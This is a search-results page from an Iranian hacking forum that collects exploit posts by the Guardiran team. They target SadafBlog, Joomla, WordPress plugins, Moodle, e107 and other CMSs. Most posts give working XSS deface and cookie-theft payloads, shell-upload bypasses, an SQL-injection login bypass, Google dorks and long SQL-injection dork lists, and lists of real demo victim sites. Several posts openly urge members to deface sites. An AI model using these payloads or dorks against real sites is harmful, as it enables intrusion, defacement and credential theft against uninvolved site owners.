رفتن به مطلب
  • Black
  • Blueberry
  • Slate
  • Blackcurrant
  • Watermelon
  • Strawberry
  • Orange
  • Banana
  • Apple
  • Emerald
  • Chocolate
  • Charcoal

عضویت ویژه طلایی گارد ایران با تخفیف 50%

برای عضویت کلیک کنید

جستجو در تالار

در حال نمایش نتایج برای برچسب های 'exploit'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالار ها

  • انجمن های فعال
    • قوانین و اطلاعیه های سایت
    • سوال و جواب های عمومی
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • اخبار هک و امنیت
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

دسته ها

  • Articles

دسته ها

  • ویدیوهای آموزشی

25 نتیجه پیدا شد

  1. * Title : SadafBlog Script Cross Site Scripting ( Xss Stored ) * Date : 6/19/2017 * Dork : inurl:list.php intitle:فهرست وبلاگ ها * Author : GIST * YouTube : https://youtu.be/a1hN9KC3wUQ * Version : All Version * Script Download : https://goo.gl/d7yDrt * Vendor HomePage : - * Tested On : Windows 10 About Script : Sadaf Blog SCript for blogs is beautiful and diverse capabilities including the ability to recruit blogs, etc. Some Of Facilities Of Sadaf Blog Script : 1-Allowing verification of reader comments to display 2-Assign a URL 3-The possibility of exclusive design templates or change in form, color and design blog 4-Ability to insert labels for each entry 5-Allocates 300 MB for upload in the blog admin panel And ... Exploit : 1- Open Target 2- Register A New Weblog ( Usually You Can Find It 'register' or 'register.php' ) 3- Complet Fields. 4- In Field Of Title Weblog Have To Use Inspect Element To Removing restrictions Of Character Delete This Part ' maxlength="60" ' 5- Input Your Deface Page in Title WEblog Filed 6-Click Save And Go To List Of Weblogs ( Usually You Can Find It 'list' or 'list.php' ) 7- You Will See Your Deface Page :) Demo : http://raziblog.ir/ http://shikblog.ir/ http://7blog.ir/ https://cxsecurity.com/issue/WLB-2017060128
  2. http://0day.today/exploit/description/27854 # Title : XAMPP v5.6.30 Local Buffer Overflow Exploit # Date : 5/27/2017 # Author : Guardiran Security Team # Tested On : Windows 10 # Demo Video : https://www.youtube.com/watch?v=fCay_l0dfcE&feature=youtu.be # CVE : - # Exploitation Technique : Local # Product & Service Introduction : https://www.apachefriends.org/index.html # Link Softwar : https://www.apachefriends.org/download.html # Version : v5.6.30 Description : Hello Guys. The vulnerability is caused by the lack of restrictions on the number of characters On Configuration of Control Panel [ Editor ] Character limit was applied only up to 256 characters If The Number Of characters Be up to 256 characters The Softwar will crash. [ModuleNames] Apache=Apache MySQL=MySQL FileZilla=FileZilla Mercury=Mercury Tomcat=Tomcat [Common] Edition= Editor=257 characters [ if the number of characters Be up to 256 characters The Softwar will crash] Browser= Debug=0 Debuglevel=0 TomcatVisible=1 Language=en Minimized=0 ======================================================== Exploit : 1- Run Xampp Control Panel [ xampp-control.exe] 2- Click Config > Editor 3- Select A Name With 257 Character Or up to 257 characters 4- Click Save 5- If You Click The Each Button The Softwar Will Crash Error Log : 1-Access Violation at address 0040A192 id module 'xampp-control.exe' & 2-Access Violation at address 0065AE42 id module 'xampp-control.exe' ========================================================= Discovered By : DeMoN Tnx All Member Guardiran Security Team # 0day.today [2017-05-28] #
  3. http://iedb.ir/exploits-7472.html ########################### # Microsoft Windows Authenticated Command Execution Vulnerability ########################### * Title: Microsoft Windows Authenticated Command Execution * Download Psexec Tools : https://technet.microsoft.com/en-us/bb842062 * Date : 5/1/2017 * Architectures : x86, x64 * Targets : Automatic * Version : All Version * VulnerabilityType Other : Command Execution * Vendor of Product : Microsoft * Affected Product Code Base : Windows xp , 7 , 8 , 8.1 , 10 , Windows Servers * Attack Type : Remote * Impact Code execution : trues * Video Link : https://www.youtube.com/watch?v=8yCtOTxe68w&t=11s ============================================= Reported By : Guardiran Security Team [DeMoN] ============================================= Description: We Use "psexec" utility provided by SysInternals To Get Access From Other Users on Server Without Any Payload Or User & Password If I Want To Connect To the Other users Without psexec I Will Get { unknown user or bad password } Error. With psexec ==> Connect Correctly To The User Target Without psexec ==> unknown user or bad password We Can Use Psexec Tool To Connect To the Other USers without Any Username and password For Example: First Check query user then run psexec tool on cmd and run This command [ psexec -s \\localhost cmd ] then user command [ tscon ID Number(for example 1) /dest:console ] Windows Without Checking Any User and Password Connect To The User ID 1
  4. * Title: puzzle creator CMS File Upload vulnerability * date: 4/22/2017 * Exploit Author : Gudrdiran Security Team * Google Dork : intitle:"puzzle creator" "index.php=difficulty=" * Softwar Link : http://www.puzzle-maker.com/ * Vendor Homepage: https://www.nimble.com/ * Tested On : Kali Linux w3af / Windows 8.1 ---------------------------------- Description : Hello Guys This is a file upload exploit we can upload our shell With Tamper data or Live Http Header Dir Shell: When You Bypass Your Shell With Tamper Data Or Live Http Header Target Will Be Shown you The URL( Shell ) Usually Dir Shell : /puzzle/name_shell.php Poc: Page vulnerable : [/puzzle/] Exploit : /puzzle/upload.php Demo: http://www.brandonbrady.com/puzzle/upload.php http://www.kidtopia.info/puzzle/upload.php http://www.teachertopia.info/puzzle/upload.php * Special Tnx : cod3!nj3ct!0n , REX , alizombie , abarestan , MR.IMAN , reza attacker , No_one , dastmale-sorkh , 1TED , Reza Attacker , J.ALL_Editor , S9pY, * Discovered By : DeMoN * We Are Guardiran Security Team https://cxsecurity.com/issue/WLB-2017040150
  5. باگ FBDj Stats cms Sql Injection Vulnerability ثبت شده توسط تیم امنیتی گارد ایران ########################### # FBDj Stats cms Sql Injection Vulnerability ########################### ########################### # FBDj Stats cms SQL Injection Vulnerability ########################### # Exploit Title: FBDj Stats cms SQL Injection Vulnerability # Date: 16/08/2016 # Exploit Author: Guardiran Security Team # Google Dork: inurl:\"playerdetails.php?id=\" # Version: All Version # Tested on: windows 10,kali linux,windows 8.1 HEllo Guys. This Is a Sql Injection Vulnerability You Can Inject The Sites Without Sql Injection Bug â��------------------------------â�� SQL INJECTION : This CMS And Also Have sqli Vulnerability. We Can inject the Bug As follows ... Bug in : [$site]/[Patch]/playerdetails.php?id=[sql] Demos : http://ts3.virtualpilots.fi/playerdetails.php?id=558 http://stats.acesovereurope.org/playerdetails.php?id=1659 http://www.dutcharcade.com/Sturmovik/playerdetails.php?id=2192 www.battle-fields.com/BF1stats/playerdetails.php?id=1 * Special Tnx : cod3!nj3ct!0n , REX , alizombie , dastmale-sorkh ,Comrade,Abarestan, Reza.attcker , 1TED , J_All_Editor * Discovered By : 1TED * We Are Guardiran Security Team * Guardiran.org ########################### ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-08-18] ###########################
  6. در این فیلم آموزشی به شما آموزش میدم تا توسط Websploit در کالی لینوکس ( Kali linux Websploit ) بتونید لیست دایرکتوری تارگت مورد نظر رو به نمایش در بیارید . پسورد فایل : guardiran.org . Directory Scanner WebSploit .rar
  7. دورک باگ Sql Injection inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id=d= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurltray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?av inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurlreview.php?id= inurl:loadpsb.php?id= inurlpinions.php?id= inurl:spr.php?id= inurlages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurlarticipant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurlrod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurlerson.php?id= inurlroductinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurlrofile_view.php?id= inurl:category.php?id= inurlublications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurlrod_info.php?id= inurl:shop.php?do=part&id= inurlroductinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurlroduct.php?id= inurl:releases.php?id= inurl:ray.php?id= inurlroduit.php?id= inurlop.php?id= inurl:shopping.php?id= inurlroductdetail.php?id= inurlost.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurlage.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurlroduct_ranges_view.php?ID= inurl:shop_category.php?id= inurl:tran******.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurl:ages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurlpinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt=
  8. سلام خدمت اعضا محترم گارد ایران. خوب در این پست بنده قصد دارم که اکسپلویت نویسی رو به شما عزیزان آموزش بدم. بعضی از دوستان میپرسیدن که چطوری اکسپلویت ثبت میکنی و باگ پیدا میکنی و.. به همین خاطر تصمیم به ساخت این مجموعه گرفتم. خوب من از جناب گوگل برای ثبت اکسپلویت استفاده میکنم ولی اگر استقابال بشه از ابزارهای لینوکس هم میزارم. اهداف بنده از ایجاد این تاپیک: 1-کمک به افزایش سطح علمی عزیزان گارد ایران. 2-بالابردن تیم در بین تیم ها ثبت اکسپلویت 3-افزایش روز به روز تعداد اکسپلویتر و دیفیسر های تیم. اموزش پیدا کردن باگ هایxss,lfi,sql,shell upload,..در cms های مختلف==>اکسپلویت کردن==>ریپورت دادن=ثبت شدن باگ خوب دوستان گفته باشم استقبال نشه تاپیک دیر به دیر آپدیت میشه. به امید روزی که نام تک تک شما عزیزان رو در بخش ثبت اکسپلویت ببینیم.
  9. با سلام وخسته نباشید میشه چند تا اکسپیولت واسه هک کردن گوشی رو بدید که در کالی مورد استفاده باشه و کارش رو توضیح بدید
  10. سلام مجدد. خوب اینم دومین باگ جوملا که اینم رده HIGH هست خدمت شما عزیزان گل تیم. ثبت اکسپلویت Joomla Remot File Upload Vulnerability به نام تیم امنیتی گارد ایران. https://cxsecurity.com/issue/WLB-2015110194 http://iedb.ir/exploits-4198.html ######################################################## # Exploit Title: Joomla Remot File Upload Vulnerability ######################################################## # Google Dork1: inurl:index.php?option=com_media & site:com # Google Dork2: inurl:index.php?option=com_media & site:org # Google Dork3: inurl:index.php?option=com_media & site:net # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [https://developer.joomla.org/joomlacode-archive/issue-29776.html] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.This Is A Olugin Of Joomla For Upload Files. # Exploit: # Add This Link After Address Target # /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # For Exmple: Site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder ######################################################## # Demo: # http://drugfreeclubXsofamerica.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.saba4X215.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.johnwargoX.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author= # http://www.diffhospitXal.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.smartcaXrleasing.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://fvteamsportXs.com/joomla/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  11. سلام خدمت دوستان عزیز گارد ایران. خوب یک دو روزی کم رنگ بودم برگشتم با ثبت دوتا باگ رده HIGH برای تیم و شما عزیزان که کلی سایت دیفیس کنین. ثبت اکسپلویت Joomla Autostand File Upload Vulnerability به نام تیم امنیتی گارد ایران. https://cxsecurity.com/issue/WLB-2015110195 http://iedb.ir/exploits-4199.html ######################################################## # Exploit Title: Joomla Autostand File Upload Vulnerability ######################################################## # Google Dork: inurl:/images/autostand/ # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://100cms.org/extension/joomla/4801-Autostand] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # This Is Like As RFU Bug. # You Can Upload Your Image In Your Target. # Also You Can Bypass Your Shell To .jpg Then Upload It In Target. ######################################################## # Exploit: # Add This Link To Target After This The Words: # /pt/ | /asp/ And The Other Words # {/index.php?option=com_autostand&func=newItem} ######################################################## # Demo: # http://smartXonecity.com/pt/index.php?option=com_autostand&func=newItem # http://smaXrtonecity.com/pt/index.php?option=com_autostand&func=newItem #http://www.antaresXmotors.cl/asp/index.php?option=com_autostand&func=newItem # http://autoschapaXs.com/index.php?option=com_autostand&func=newItem # http://lepetitvo.cXom/index.php?option=com_autostand&func=newItem # http://www.geeX-wagen.co.uk/index.php?option=com_autostand&func=newItem # http://www.auXtorimessafranco.com/index.php?option=com_autostand&func=newItem # http://www.fXirstcar45.fr/annonces-automobile/newitem ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  12. ثبت اکسپلویت (e107 v2 Bootstrap CMS XSS Vulnerability) به نام تیم امنیتی گارد ایران(Guardiran Security Team). به امید پیشرفت های روز افزون تیم بزررگ گارد ایران. https://cxsecurity.com/issue/WLB-2015110174 ######################################################## # Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability ######################################################## # Google Dork: Proudly powered by e107 # Date: [19/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://e107.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # CMS user details section is vulnerable to XSS. You can run XSS payloads. # XSS Vulnerability #1: # Go Update user settings page # "http://{target-url}/usersettings.php" # Set Real Name value; # "><script>alert(String.fromCharCode(88, 83, 83))</script> # or # "><script>alert(document.cookie)</script> ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  13. ثبت اکسپلویت (bisnis7/Cross Site Scripting(XSS به نام تیم امنیتی گارد ایران(Guardiran Security Team). https://cxsecurity.com/issue/WLB-2015110116 http://iedb.ir/exploits-4130.html ######################################################## # Exploit Title: bisnis7/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by Bisnis7 " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://bisnis7.com.webstatsdomain.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://www.rumahguidXes.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.geestringXs.net/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://dumbwaiterinXdonesia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  14. ثبت اکسپلویت (StudioWeb/Cross Site Scripting(XSS به نام تیم امنیتی گارد ایران(Guardiran Security Team). https://cxsecurity.com/issue/WLB-2015110115 http://iedb.ir/exploits-4129.html ######################################################## # (Exploit Title: StudioWeb/Cross Site Scripting(XSS ######################################################## # Google Dork: inurl:"poto" intext:"powered by StudioWeb " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://www.studioweb.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://assalamherbal222X.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://susu-bubuk.comX/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://bestbeachbungXalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.ptskk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.goholidayX-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalboXhemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################
  15. با عرض سلام و خسته نباشید. ثبت اکسپلویت (Shop737/Cross Site Scripting(XSS توسط تیم امنیتی گارد ایران رو به تمامی اعضا محترم گارد ایران تبریک عرض میکنم. به امید موفقیت های روزافزون. https://cxsecurity.com/issue/WLB-2015110107 http://iedb.ir/exploits-4123.html ######################################################## # Exploit Title: Shop737/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by Shop737" # Date: [14/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://www.shop737.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://www.pasirindo.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://susu-bubuk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://bestbeachbunXgalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.ptskk.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.goholidaXy-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalXbohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Best Friends: The First God C0d3!nj3ct!0n REX GrYpHoN BLACKH4T abarestan GooD LucK
  16. ثبت اکسپلویت Arveen Tazh Afarin CMS Login page Bypass Vulnerability به نام تیم امنیتی گارد ایران(Guardiran Security Team). به امید پیشرفت های روز افزون. یا حق https://cxsecurity.com/issue/WLB-2015110058 http://iedb.ir/exploits-4080.html ######################################################## # Exploit Title: Arveen Tazh Afarin CMS Login page Bypass Vulnerability ######################################################## # Google Dork: intext:Powered & design by ARVEEN TAZH AFARIN # Date: [08/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://arveentazh.en.ec21.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.You Have To Enter This Dork And Bypass The Login Page And Do Anythink In Your Target. ######################################################## # 'Username : '=''or # # 'Password : '=''or ####################################################### # Demo: # http://roudbaXrak.com/modir.php # http://ariasaXyan.ir/modir.php # http://atouXrs.ir/modir.php ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN######################################################## My Best Friends The Fitst GOD GrYpHoN BLACKH4T REX C0d3!nj3ct10n
  17. با عرض سلام و خسته نباشید. ثبت اسکپلویت Moodle cms/Cross Site Scripting(XSSبه نام تیم گارد ایران سکیوریتی تیم. https://cxsecurity.com/issue/WLB-2015110051 http://iedb.ir/exploits-4074.html ######################################################## # Exploit Title: Moodle cms/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:/course/category.php?id= # Date: [06/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [https://moodle.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target. # Then Replace This Code # [/help.php?text=hecked_text] # Instead # [/course/category.php?id=] # And Replace Your Text Deface At [hecked_text] And You See That To Site Defaced With You. ######################################################## # Demo: # http://moodle.jonfila.Xcom/help.php?text=Hacked_By_DeMoN # http://elearning.noeXtic.org/help.php?text=Hacked_By_DeMoN # http://nehacert.org/Xmoodle/help.php?text=Hacked_By_DeMoN # http://dwmbeancoXunter.com/moodle/help.php?text=Hacked_By_DeMoN # http://ipesvirtual.Xdfpd.edu.uy/help.php?text=Hacked_By_DeMoN # http://clickandleXarn.bmgi.org/help.php?text=Hacked_By_DeMoN # http://learnonlxine.health.nz/help.php?text=Hacked_By_DeMoN ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################
  18. سلام خدمت اعضا محترم گارد ایران. کشف باگ Wordpress Plugin easy-comment-uploads File Upload Vulendrability توسط تیم و ثبت آن به نام گارد ایران سکیوریتی تیم(Guardiran) https://cxsecurity.com/issue/WLB-2015110049 http://iedb.ir/exploits-4073.html ######################################################## Exploit Title: Wordpress Plugin easy-comment-uploads File Upload Vulendrability # ######################################################## Google Dork: inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php # Date: [06/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor # Homepage: [https://wordpress.org/support/topic/plugin-easy-comment-uploads-got-hacked-because-of-this-plugin] Software Link: [-]# Version: [-]# Tested on: [Win 8.1/Google chrome]# CVE : [-]# ######################################################## DISCRIPTION: Hello Guys.You Can Upload Deafce Oage Or Your Shell.When You Uploaded Your Files# You Have To Go To This Section.# [/wp-content/uploads/2015/].# Please Pay Attention.Today Is 06/11/2015.If You Going To Upload Your Files In One Month Later# The Link Of Your Files Will Be# [/wp-content/uploads/2015/07].# GooD LucK My Friends.# ######################################################## Demo:# https://www.fairyhouses.Xcom/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.mukorom.inXfo/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.toiwhakaarXi.ac.nz/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.ritalee.coXm.br/blog/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.asecretgXiftbook.com/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.wildschXoenau.tv/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.nekudXathibur.com/wp-content/plugins/easy-comment-uploads/upload-form.php# ######################################################## Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T We Are Guardiran Security Team# Discovered By:DeMoN# ########################################################
  19. در این کتاب آموزشی با مباحث زیر آشنا خواهید شد و برای دوستانی که به مبحث اکسپلویت نویسی Exploit Programming علاقه دارند بسیار مفید خواهد بود و مباحث عبارتند از : ساختار و طرز عملکرد اکسپلویت ها طرز نوشتن اکسپلویت ها و شل کد ها مشکلات مشترک در اکسپلویت نویسی ها و بسیاری از مباحث مهم و کاربردی توضیح داده شده است . پسورد : guardiran.org . Exploit Development Advanced.rar
  20. با سلام خدمت دوستان گل 'گارد ایران. سایت 1337day سایتی هست برای خریدو فروش اکسپلویتها و این تاپیک رو زدم تا اکسپلویت ها رو پاپلیک کنم و رفیقای خودم الکی پول هنگفتی به سایت هایی مثل این ندن و شما هم اگر چیزی داشتید که مربوط میشد و قصد پاپلیکش رو داشتید که به این سایت مربوط میشد در این جا قرار بدید تا پراکنده نشه فقط اسپم نکنید سوالی داشتید پ خ کنید اولیشو میزارم به نام: vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day لینک خریدش که به قیمت 500gold هست : http://1337day.com/exploit/description/20002pass:guardiran.orgNew Text Document.rar
